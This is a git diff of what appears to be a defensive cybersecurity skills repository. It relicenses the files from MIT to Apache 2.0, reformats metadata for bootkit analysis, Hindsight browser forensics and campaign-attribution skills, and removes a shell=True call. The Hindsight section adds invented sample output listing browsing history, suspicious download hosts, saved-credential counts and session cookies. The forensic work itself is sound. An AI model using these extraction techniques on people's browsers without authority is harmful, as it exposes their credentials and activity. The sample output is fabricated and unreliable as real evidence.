      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,17 +1,35 @@
 ---
 name: analyzing-bootkit-and-rootkit-samples
-description: >
+description: 'Analyzes bootkit and advanced rootkit malware that infects the Master
-  Analyzes bootkit and advanced rootkit malware that infects the Master Boot Record (MBR),
+  Boot Record (MBR), Volume Boot Record (VBR), or UEFI firmware to gain persistence
-  Volume Boot Record (VBR), or UEFI firmware to gain persistence below the operating system.
+  below the operating system. Covers boot sector analysis, UEFI module inspection,
-  Covers boot sector analysis, UEFI module inspection, and anti-rootkit detection techniques.
+  and anti-rootkit detection techniques. Activates for requests involving bootkit
-  Activates for requests involving bootkit analysis, MBR malware investigation, UEFI
+  analysis, MBR malware investigation, UEFI persistence analysis, or pre-OS malware
-  persistence analysis, or pre-OS malware detection.
+  detection.
  '
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [malware, bootkit, rootkit, UEFI, MBR-analysis]
+tags:
 - malware
 - bootkit
 - rootkit
 - UEFI
 - MBR-analysis
 version: 1.0.0
 author: mahipal
-license: MIT
+license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1542.003
 - T1542.001
 - T1542.002
 - T1014
 - T1547.006
 ---
 # Analyzing Bootkit and Rootkit Samples
@@ -112,8 +112,11 @@ def analyze_boot_code(mbr_data):
 def run_volatility_rootkit_scan(memory_dump, plugin):
    """Run a Volatility 3 plugin for rootkit detection via subprocess."""
-    cmd = f"vol3 -f {memory_dump} {plugin}"
+    result = subprocess.run(
-    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
+        ["vol3", "-f", memory_dump, plugin],
        capture_output=True, text=True,
        timeout=120,
    )
    return result.stdout, result.stderr, result.returncode
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,12 +1,34 @@
 ---
 name: analyzing-browser-forensics-with-hindsight
-description: Analyze Chromium-based browser artifacts using Hindsight to extract browsing history, downloads, cookies, cached content, autofill data, saved passwords, and browser extensions from Chrome, Edge, Brave, and Opera for forensic investigation.
+description: Analyze Chromium-based browser artifacts using Hindsight to extract browsing
  history, downloads, cookies, cached content, autofill data, saved passwords, and
  browser extensions from Chrome, Edge, Brave, and Opera for forensic investigation.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [browser-forensics, hindsight, chrome-forensics, chromium, edge, browsing-history, cookies, downloads, cache, web-artifacts]
+tags:
-version: "1.0"
+- browser-forensics
 - hindsight
 - chrome-forensics
 - chromium
 - edge
 - browsing-history
 - cookies
 - downloads
 - cache
 - web-artifacts
 version: '1.0'
 author: mahipal
-license: MIT
+license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1217
 - T1539
 - T1555.003
 - T1185
 ---
 # Analyzing Browser Forensics with Hindsight
@@ -15,6 +37,14 @@ license: MIT
 Hindsight is an open-source browser forensics tool designed to parse artifacts from Google Chrome and other Chromium-based browsers (Microsoft Edge, Brave, Opera, Vivaldi). It extracts and correlates data from multiple browser database files to create a unified timeline of web activity. Hindsight can parse URLs, download history, cache records, bookmarks, autofill records, saved passwords, preferences, browser extensions, HTTP cookies, Local Storage (HTML5 cookies), login data, and session/tab information. The tool produces chronological timelines in multiple output formats (XLSX, JSON, SQLite) that enable investigators to reconstruct user web activity for incident response, insider threat investigations, and criminal cases.
 ## When to Use
 - When investigating security incidents that require analyzing browser forensics with hindsight
 - When building detection rules or threat hunting queries for this domain
 - When SOC analysts need structured procedures for this analysis type
 - When validating security monitoring coverage for related attack techniques
 ## Prerequisites
 - Python 3.8+ with Hindsight installed (`pip install pyhindsight`)
@@ -213,3 +243,60 @@ if __name__ == "__main__":
 - Chrome Forensics Guide: https://allenace.medium.com/hindsight-chrome-forensics-made-simple-425db99fa5ed
 - Browser Forensics Tools: https://www.cyberforensicacademy.com/blog/browser-forensics-tools-how-to-extract-user-activity
 - Chromium Source (History): https://source.chromium.org/chromium/chromium/src/+/main:components/history/
 ## Example Output
 ```text
 $ python hindsight.py -i /evidence/chrome-profile -o /analysis/hindsight_output
 Hindsight v2024.01 - Chrome/Chromium Browser Forensic Analysis
 ================================================================
 Profile: /evidence/chrome-profile (Chrome 120.0.6099.130)
 OS: Windows 10
 [+] Parsing History database...
    URL records:          12,456
    Download records:     234
    Search terms:         567
 [+] Parsing Cookies database...
    Cookie records:       8,923
    Encrypted cookies:    6,712
 [+] Parsing Web Data (Autofill)...
    Autofill entries:     1,234
    Credit card entries:  2 (encrypted)
 [+] Parsing Login Data...
    Saved credentials:    45 (encrypted)
 [+] Parsing Bookmarks...
    Bookmark entries:     189
 --- Browsing History (Last 10 Entries) ---
 Timestamp (UTC)          | URL                                          | Title                        | Visit Count
 2024-01-15 14:32:05.123  | https://mail.corporate.com/inbox             | Corporate Mail                | 45
 2024-01-15 14:33:12.456  | https://drive.google.com/file/d/1aBcDe...    | Q4_Financial_Report.xlsx     | 1
 2024-01-15 14:35:44.789  | https://mega.nz/folder/xYz123               | MEGA - Secure Cloud          | 3
 2024-01-15 14:36:01.234  | https://mega.nz/folder/xYz123#upload        | MEGA - Upload                | 8
 2024-01-15 14:42:15.567  | https://pastebin.com/raw/kL9mN2pQ           | Pastebin (raw)               | 1
 2024-01-15 15:01:33.890  | https://192.168.1.50:8443/admin              | Admin Panel                  | 12
 2024-01-15 15:15:22.111  | https://transfer.sh/upload                  | transfer.sh                  | 2
 2024-01-15 15:30:45.222  | https://vpn-gateway.corporate.com            | VPN Login                    | 5
 2024-01-15 16:00:00.333  | https://whatismyipaddress.com                 | What Is My IP                | 1
 2024-01-15 16:05:12.444  | https://protonmail.com/inbox                 | ProtonMail                   | 3
 --- Downloads (Suspicious) ---
 Timestamp (UTC)          | Filename                    | URL Source                               | Size
 2024-01-15 14:33:15.000  | Q4_Financial_Report.xlsm   | https://phish-domain.com/docs/report     | 245 KB
 2024-01-15 14:34:02.000  | update_client.exe          | https://cdn.evil-updates.com/client.exe  | 1.2 MB
 --- Cookies (Session Tokens) ---
 Domain                   | Name              | Expires            | Secure | HttpOnly
 .corporate.com           | SESSION_ID        | 2024-01-16 14:32   | Yes    | Yes
 .mega.nz                 | session           | Session            | Yes    | Yes
 .protonmail.com          | AUTH-TOKEN        | 2024-02-15 00:00   | Yes    | Yes
 Report saved to: /analysis/hindsight_output/Hindsight_Report.xlsx
 ```
@@ -10,8 +10,6 @@ import sys
 import json
 import sqlite3
 import datetime
 import hashlib
 from collections import defaultdict
 def chrome_time_to_datetime(chrome_time):
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -1,12 +1,31 @@
 ---
 name: analyzing-campaign-attribution-evidence
-description: Campaign attribution analysis involves systematically evaluating evidence to determine which threat actor or group is responsible for a cyber operation. This skill covers collecting and weighting attr
+description: Campaign attribution analysis involves systematically evaluating evidence
  to determine which threat actor or group is responsible for a cyber operation. This
  skill covers collecting and weighting attr
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [threat-intelligence, cti, ioc, mitre-attack, stix, attribution, campaign-analysis]
+tags:
-version: "1.0"
+- threat-intelligence
 - cti
 - ioc
 - mitre-attack
 - stix
 - attribution
 - campaign-analysis
 version: '1.0'
 author: mahipal
-license: MIT
+license: Apache-2.0
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1587.001
 - T1583.001
 - T1588.002
 - T1071.001
 ---
 # Analyzing Campaign Attribution Evidence
@@ -14,6 +33,14 @@ license: MIT
 Campaign attribution analysis involves systematically evaluating evidence to determine which threat actor or group is responsible for a cyber operation. This skill covers collecting and weighting attribution indicators using the Diamond Model and ACH (Analysis of Competing Hypotheses), analyzing infrastructure overlaps, TTP consistency, malware code similarities, operational timing patterns, and language artifacts to build confidence-weighted attribution assessments.
 ## When to Use
 - When investigating security incidents that require analyzing campaign attribution evidence
 - When building detection rules or threat hunting queries for this domain
 - When SOC analysts need structured procedures for this analysis type
 - When validating security monitoring coverage for related attack techniques
 ## Prerequisites
 - Python 3.9+ with `attackcti`, `stix2`, `networkx` libraries
@@ -40,7 +67,7 @@ Campaign attribution analysis involves systematically evaluating evidence to det
 ### Analysis of Competing Hypotheses (ACH)
 Structured analytical method that evaluates evidence against multiple competing hypotheses. Each piece of evidence is scored as consistent, inconsistent, or neutral with respect to each hypothesis. The hypothesis with the least inconsistent evidence is favored.
-## Practical Steps
+## Workflow
 ### Step 1: Collect Attribution Evidence
@@ -6,9 +6,6 @@ malware code similarity, timing patterns, and language artifacts.
 """
 import json
 import os
 import sys
 import hashlib
 import re
 from collections import defaultdict
 from datetime import datetime
@@ -1,21 +1,201 @@
 MIT License
-Copyright (c) 2025 Mahipal
+                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
-Permission is hereby granted, free of charge, to any person obtaining a copy
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
 of this software and associated documentation files (the "Software"), to deal
 in the Software without restriction, including without limitation the rights
 to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 copies of the Software, and to permit persons to whom the Software is
 furnished to do so, subject to the following conditions:
-The above copyright notice and this permission notice shall be included in all
+   1. Definitions.
 copies or substantial portions of the Software.
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+      "License" shall mean the terms and conditions for use, reproduction,
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+      and distribution as defined by Sections 1 through 9 of this document.
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+      "Licensor" shall mean the copyright owner or entity authorized by
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+      the copyright owner that is granting the License.
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+
-SOFTWARE.
+      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
